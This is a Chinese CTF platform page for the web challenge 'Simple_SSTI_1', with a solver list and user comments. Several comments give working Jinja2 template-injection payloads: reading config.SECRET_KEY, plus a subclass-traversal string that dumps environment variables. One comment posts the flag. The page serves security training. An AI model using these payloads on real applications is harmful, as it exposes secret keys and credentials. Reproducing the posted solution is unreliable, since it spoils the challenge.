Simple_SSTI_1WEB 未解决
分数:
5
金币:
2
题目作者:
valecalida
一 血:
dotast
一血奖励:
2金币
解 决:
28736
提 示:
描 述:
Simple_SSTI_1
评分(50)
解题动态
everystep 攻破了该题 15小时前
爱喝畅汁 攻破了该题 16小时前
Tylione 攻破了该题 1天前
lx723823 攻破了该题 2天前
Asher 攻破了该题 2天前
hyj11125 攻破了该题 2天前
时倾77 攻破了该题 2天前
Aurora* 攻破了该题 3天前
lizhibin 攻破了该题 3天前
lee8ly 攻破了该题 3天前
Sonetto 攻破了该题 3天前
Wendmin 攻破了该题 3天前
lmz123 攻破了该题 3天前
CD123456 攻破了该题 3天前
3121834271 攻破了该题 4天前
SamJij 攻破了该题 4天前
林蔓露 攻破了该题 6天前
Ash_1070 攻破了该题 6天前
Aromatic 攻破了该题 7天前
评论
litt 2月前
举报
flag={{config}}都直接爆出flag了
y1 2月前
举报
http://171.80.2.169:15802/?flag={{config.SECRET_KEY}}
xshzgjshpy 3月前
举报
http://171.80.2.169:10541/?flag={{config['SECRET_KEY']}}
cfggfbfxdgbb 4月前
举报
?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['environ']}}
LeoCHAn 7月前
举报
flag{********}
merrymu 8月前
举报
模板注入(Server-Side Template Injection,SSTI)是一种通过将恶意代码注入服务器端模板来执行非授权操作的安全漏洞,主要成因是开发者未对用户输入进行有效过滤,导致攻击者可利用模板引擎特性实现远程代码执行、敏感信息泄露等高危操作。 基本探测:输入{{2*2}},若返回4则存在漏洞。
HK1ng 11月前
举报
还真是简单模板注入,甚至不需要利用方法,首先传参{{7*7}}验证是否执行了语句,看到页面出现49,就知道这里存在模板注入,然后查看一下配置文件,就发现了flag。{{config}}
看writeup刷题 1年前
举报
咋SECRET_KEY还必须大写
Wang_Micro 1年前
举报
?flag={{config.SECRET_KEY}} flag{4c1f57d8ba21815847e7d477c3c86b81}
超爱西西鸭 1年前
举报
/?flag={{config.SECRET_KEY}}